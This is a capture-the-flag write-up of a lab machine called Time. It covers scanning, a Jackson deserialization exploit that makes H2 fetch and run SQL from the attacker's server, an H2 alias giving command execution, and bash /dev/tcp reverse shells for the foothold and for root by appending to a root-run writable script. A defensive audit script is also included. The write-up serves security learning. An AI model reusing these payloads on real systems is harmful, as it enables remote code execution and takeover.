[How to connect]
Time, one of the boxes on the list to work through, is in the free tier.
Clicking it shows the box's IP; ping that IP to confirm it is reachable.
┌──(root💀takudaddy)-[~]
└─# ping 10.10.10.214
PING 10.10.10.214 (10.10.10.214) 56(84) bytes of data.
64 bytes from 10.10.10.214: icmp_seq=1 ttl=63 time=263 ms
64 bytes from 10.10.10.214: icmp_seq=2 ttl=63 time=263 ms
64 bytes from 10.10.10.214: icmp_seq=3 ttl=63 time=264 ms
^C
--- 10.10.10.214 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 262.564/263.183/263.675/0.462 ms
Let's begin.
Table of Contents
1. SCANNING
2. EXPLOITATION
3. POST EXPLOITATION
4. PRIVILEGE ESCALATION
1. SCANNING
┌──(root💀takudaddy)-[~]
└─# nmap -A -p- 10.10.10.214
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 18:30 KST
Nmap scan report for 10.10.10.214
Host is up (0.26s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
| 256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_ 256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/16%OT=22%CT=1%CU=39040%PV=Y%DS=2%DC=T%G=Y%TM=60795A8
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 263.31 ms 10.10.14.1
2 263.51 ms 10.10.10.214
Relevant lines from a nikto scan of port 80:
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
127.0.1.1 is the loopback alias Debian/Ubuntu installers add for the hostname, so this "internal IP" leak tells us nothing beyond the OS family nmap already fingerprinted.
Entering input in JSON format gets it parsed and printed back.
The page also offers a "validate" mode, and the hint is in its error message. Submitting a bare word that is not valid JSON returns:
validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'takudaddy': was expecting 'null', 'true', 'false' or NaN
The exception comes from com.fasterxml.jackson.core, i.e. the Jackson JSON library, and the application leaks the raw exception text. Searching for Jackson deserialization attacks turns up the approach.
2. EXPLOITATION
https://blog.doyensec.com/page6/
The Doyensec page above carries ready-made payloads; use them for a quick experiment.
The chain behind the payload: with polymorphic (default) typing enabled, Jackson instantiates the class named in the first array element and sets the properties given in the second. Here that class is logback's DriverManagerConnectionSource, whose url is a JDBC URL pointing at an in-memory H2 database. When the connection is opened, H2 honours the INIT=RUNSCRIPT option and fetches and executes SQL from a URL we control, which gives us arbitrary SQL and, through H2's CREATE ALIAS, arbitrary Java.
1. The attack string to use
┌──(root💀takudaddy)-[/attack]
└─# echo "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.6:8000/inject.sql'\"}]"
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.6:8000/inject.sql'"}]
2. Start the listener
┌──(root💀takudaddy)-[/attack]
└─# nc -lvnp 8000
listening on [any] 8000 ...
With the listener up, paste the string printed by echo into the page.
Because inject.sql does not exist yet the request fails, but the listener shows:
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.214] 57556
GET /inject.sql HTTP/1.1
User-Agent: Java/11.0.8
Host: 10.10.14.6:8000
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
which confirms the target reached back to us. The User-Agent is Java/11.0.8, so it is the target's JVM, not a browser, fetching the script, exactly what the RUNSCRIPT chain should do.
Next, slightly modify the payload found on the same page. This first version only pings us, so the callback proves command execution:
┌──(root💀takudaddy)-[/htb/time]
└─# cat payloads.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('ping -c 2 10.10.14.6')
Copy the file, named inject.sql as the payload requests, to /var/www/html
and serve it with Python's built-in web server (port 8000 by default):
┌──(root💀takudaddy)-[/htb/time]
└─# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Watch for ICMP on the VPN interface with tcpdump:
┌──(root💀takudaddy)-[~]
└─# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
Submit the payload through the web page once more:
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.6:8000/inject.sql'"}]
tcpdump then shows:
20:46:51.913130 IP time > 10.10.14.6: ICMP echo request, id 1, seq 1, length 64
20:46:51.913143 IP 10.10.14.6 > time: ICMP echo reply, id 1, seq 1, length 64
20:46:52.913831 IP time > 10.10.14.6: ICMP echo request, id 1, seq 2, length 64
20:46:52.913845 IP 10.10.14.6 > time: ICMP echo reply, id 1, seq 2, length 64
The two echo requests arrive as expected, so the SQL script was fetched and the SHELLEXEC alias ran our command on the target.
Now replace the ping in the script with a reverse shell
and run the whole thing again.
┌──(root💀takudaddy)-[/var/www/html]
└─# cat inject.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.6/7979 0>&1')
Keep the Python web server running
and start a separate listener for the shell:
┌──(root💀takudaddy)-[/htb/time]
└─# nc -lvnp 7979
listening on [any] 7979 ...
Submit the attack string again; the web server logs the fetch and the listener gets a shell:
┌──(root💀takudaddy)-[/var/www/html]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.214 - - [16/Apr/2021 20:56:39] "GET /inject.sql HTTP/1.1" 200 -
┌──(root💀takudaddy)-[/htb/time]
└─# nc -lvnp 7979
listening on [any] 7979 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.214] 36434
bash: cannot set terminal process group (890): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$
Foothold obtained: a shell as pericles, the user the Java web application runs as, with /var/www/html as the working directory.
3. POST EXPLOITATION
pericles@time:/var/www/html$ cd /home
cd /home
uname -a
Linux time 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
pericles@time:/snap$ sudo --version
sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
pericles@time:/home$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Oct 2 2020 .
drwxr-xr-x 20 root root 4096 Apr 16 12:14 ..
drwxr-xr-x 7 pericles pericles 4096 Oct 23 09:45 pericles
pericles@time:/home$ cd pericles
cd pericles
pericles@time:/home/pericles$ ls -al
ls -al
total 44
drwxr-xr-x 7 pericles pericles 4096 Oct 23 09:45 .
drwxr-xr-x 3 root root 4096 Oct 2 2020 ..
lrwxrwxrwx 1 root root 9 Oct 1 2020 .bash_history -> /dev/null
-rw-r--r-- 1 pericles pericles 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 pericles pericles 3771 Feb 25 2020 .bashrc
drwx------ 2 pericles pericles 4096 Sep 20 2020 .cache
drwx------ 3 pericles pericles 4096 Oct 22 17:45 .config
drwx------ 2 pericles pericles 4096 Oct 23 06:53 .gnupg
lrwxrwxrwx 1 root root 9 Oct 1 2020 .lhistory -> /dev/null
drwxrwxr-x 3 pericles pericles 4096 Sep 29 2020 .local
-rw-r--r-- 1 pericles pericles 807 Feb 25 2020 .profile
drwxr-xr-x 3 pericles pericles 4096 Oct 2 2020 snap
-r-------- 1 pericles pericles 33 Apr 16 04:19 user.txt
pericles@time:/home/pericles$ cat user.txt
cat user.txt
5ca8191ba2349b4a038b47f79bf2c045
pericles@time:/home/pericles/snap/lxd/current/.config/lxc$ cat config.yml
cat config.yml
default-remote: local
remotes:
images:
addr: https://images.linuxcontainers.org
protocol: simplestreams
public: true
local:
addr: unix://
public: false
aliases: {}
pericles@time:/home$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 22840 Aug 16 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 473576 May 29 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 130152 Jul 10 2020 /usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root messagebus 51344 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
-rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 85064 Apr 16 2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 55528 Apr 2 2020 /usr/bin/mount
-rwsr-xr-x 1 root root 166056 Jan 19 14:21 /usr/bin/sudo
-rwsr-xr-x 1 root root 67816 Apr 2 2020 /usr/bin/su
-rwsr-xr-x 1 root root 88464 Apr 16 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39144 Apr 2 2020 /usr/bin/umount
-rwsr-xr-x 1 root root 53040 Apr 16 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 68208 Apr 16 2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 44784 Apr 16 2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root 110792 Oct 8 2020 /snap/snapd/9721/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 110792 Sep 30 2020 /snap/snapd/9607/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 43088 Jan 8 2020 /snap/core18/1705/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/1705/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/1705/bin/su
-rwsr-xr-x 1 root root 26696 Jan 8 2020 /snap/core18/1705/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/1705/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/1705/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/1705/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/1705/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/1705/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 31 2020 /snap/core18/1705/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/1705/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Mar 5 2020 /snap/core18/1885/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 26696 Mar 5 2020 /snap/core18/1885/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/1885/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/1885/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/1885/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 31 2020 /snap/core18/1885/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
pericles@time:/snap$ ls -al
ls -al
total 28
drwxr-xr-x 6 root root 4096 Sep 20 2020 .
drwxr-xr-x 20 root root 4096 Apr 16 12:28 ..
-r--r--r-- 1 root root 548 Sep 20 2020 README
drwxr-xr-x 2 root root 4096 Oct 22 08:14 bin
drwxr-xr-x 4 root root 4096 Sep 21 2020 core18
drwxr-xr-x 4 root root 4096 Oct 22 08:14 lxd
drwxr-xr-x 4 root root 4096 Oct 22 08:14 snapd
pericles@time:/snap$ cat README
cat README
This directory presents installed snap packages.
It has the following structure:
/snap/bin - Symlinks to snap applications.
/snap/<snapname>/<revision> - Mountpoint for snap content.
/snap/<snapname>/current - Symlink to current revision, if enabled.
DISK SPACE USAGE
The disk space consumed by the content under this directory is
minimal as the real snap content never leaves the .snap file.
Snaps are *mounted* rather than unpacked.
For further details please visit
https://forum.snapcraft.io/t/the-snap-directory/2817
pericles@time:/snap$
pericles@time:/snap$ find /usr/bin -writable -type f 2>/dev/null
find /usr/bin -writable -type f 2>/dev/null
/usr/bin/timer_backup.sh
pericles@time:/home/pericles$ ls -l /usr/bin/timer_backup.sh
ls -l /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Apr 16 12:50 /usr/bin/timer_backup.sh
pericles@time:/home/pericles$ cat /usr/bin/timer_backup.sh
cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
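The `find /usr/bin -writable` step above is the one that pays off: a script that a low-privileged user can edit but root executes. The helper below is an added example, not part of the original write-up; it generalises that check to the usual system bin directories and, where `systemctl` is available, to whatever programs systemd timers actually start. That a timer runs timer_backup.sh is an assumption suggested by the name and by the copy in /root; the write-up never shows the unit. The systemd part needs GNU find and systemd's `systemctl show --value`; the permission checks run anywhere with GNU find.

```shell
#!/bin/sh
# Added audit helper (not from the write-up): find files a non-root user can
# change but root is likely to execute, like /usr/bin/timer_backup.sh above.

# 0 if FILE grants write to group or other (the write-up's script is -rwxrw-rw-).
is_loose_perm() {
  [ -f "$1" ] && [ -n "$(find "$1" -maxdepth 0 -perm /022 2>/dev/null)" ]
}

# Regular files under DIRS with the group- or other-write bit set.
loose_perm_files() {
  find "$@" -xdev -type f -perm /022 2>/dev/null
}

# Regular files under DIRS the current user can write by any bit (this is the
# check the write-up ran; write access to the *directory*, which lets you
# replace a file outright, is a separate check not covered here).
writable_files() {
  find "$@" -xdev -type f -writable 2>/dev/null
}

# For every systemd timer, resolve the service it activates and the program
# ExecStart runs; print "timer service owner:group mode path" for programs
# with loose permissions. Only the first ExecStart path of each unit is shown.
timer_exec_audit() {
  command -v systemctl >/dev/null 2>&1 || { echo "systemctl not found" >&2; return 1; }
  systemctl list-timers --all --no-legend --no-pager 2>/dev/null |
    awk '{print $(NF-1), $NF}' |
    while read -r timer svc; do
      path=$(systemctl show -p ExecStart --value "$svc" 2>/dev/null |
             sed -n 's/.*path=\([^ ;]*\).*/\1/p' | head -n 1)
      [ -n "$path" ] || continue
      if is_loose_perm "$path"; then
        echo "$timer $svc $(stat -c '%U:%G %a' "$path") $path"
      fi
    done
}

# Run the full audit only when asked for explicitly: sh audit.sh audit
if [ "${1:-}" = audit ]; then
  echo "# files with group/other write under system bin dirs"
  loose_perm_files /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /bin /sbin
  echo "# files writable by $(id -un) under system bin dirs"
  writable_files /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /bin /sbin
  echo "# systemd timer targets with loose permissions"
  timer_exec_audit
fi
```

On the box, the first two lists would both contain /usr/bin/timer_backup.sh (it is owned by pericles and mode 766); the timer audit is what tells you root will run it, which `find -writable` alone does not.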
4. PRIVILEGE ESCALATION
pericles@time:/var/www/html$ cd /usr/bin
cd /usr/bin
pericles@time:/usr/bin$ cat timer_backup.sh
cat timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
pericles@time:/usr/bin$ echo 'bash -c "bash -i >& /dev/tcp/10.10.14.6/8989 0>&1"' >>timer_backup.sh
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.6/8989 0>&1"' >>timer_backup.sh
The file is owned by pericles but, as the callback below shows, executed by root. Nothing in our shell runs it; the appended line fires only when root next runs the script, so have the listener up and wait. The copy in /root and the script's fresh mtime (12:50 on a box that came up at 12:14) suggest it is rewritten periodically, so if no callback arrives, check that the appended line is still there.
┌──(root💀takudaddy)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.214] 47804
bash: cannot set terminal process group (100714): Inappropriate ioctl for device
bash: no job control in this shell
root@time:/# cd /root
cd /root
root@time:/root# ls
ls
backup.zip
root.txt
snap
timer_backup.sh
root@time:/root# cat root.txt
cat root.txt
527fbf05ab7c9795032693e1712cd19c
root@time:/root# exit
Done.